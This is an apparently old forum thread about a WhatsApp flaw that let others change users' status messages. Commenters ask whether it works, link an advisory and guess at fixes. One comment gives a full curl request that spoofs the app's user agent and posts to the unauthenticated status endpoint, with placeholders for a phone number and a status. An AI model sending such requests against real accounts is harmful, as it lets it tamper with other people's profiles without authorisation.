Whatsapp security hole allows changing status message of other users

57 points by sssparkkk, over 13 years ago

12 comments

alex1, over 13 years ago
The site says the hole has been patched but I was just able to change my own status with this:

    curl -A "WhatsApp/2.6.7 iPhone_OS/5.0.1 Device/iPhone_4" \
      --header "Accept-Language: en-us" \
      --header "Accept-Encoding: gzip, deflate" \
      --header "Connection: keep-alive" \
      -d "cc=1&me=%2B1{10_DIGIT_NUMBER}&s={URL_ENCODED_STATUS}" \
      https://s.whatsapp.net/client/iphone/u.php

It did take some time to show up under my name, even after restarting the app.
chintan100, over 13 years ago
Did anybody have any success with changing someone else's status with this? If so, please post.

I got the success message on site and restarted the app too on iPhone by killing it from the multitasking bar but my friend's status is still unchanged.

Makes me doubt it is a fraud site as BuddhaSource mentioned.
sssparkkk, over 13 years ago
Some more information about this can be found here: http://packetstormsecurity.org/files/108010/SA-20111219-1.txt
fredley, over 13 years ago
As a frequent WhatsApp user, I must say I find this more amusing than anything. I've never really understood what the status feature is for anyway.
steipete, over 13 years ago
It's not changing status anymore, did they already block the site's IP?
BuddhaSource, over 13 years ago
Is this a Fraud site? Not working for me.
richardburton, over 13 years ago
I could not change mine. If the leak is plugged would you be willing to explain where the hole is?
jaipilot747, over 13 years ago
What would the legal liabilities of this site be?
dopp, over 13 years ago
dumb question - how exactly can I try this? I went to the site, but didn't find relevant information.
thelicx, over 13 years ago
Not working for me.
beerglass, over 13 years ago
Ridiculous!
startupcto, over 13 years ago
There are a few ways that they can patch this. I'm assuming that there's some sort of auth process in place for their HTTP calls and this could simply be a case where this particular endpoint missed the auth.

Or they're simply blocking the whatsappstatus's IP and a fix would actually require both client side and server side changes.

But honestly it's just a messaging app and how many people really care if "let's go grab a beer" is encrypted or not.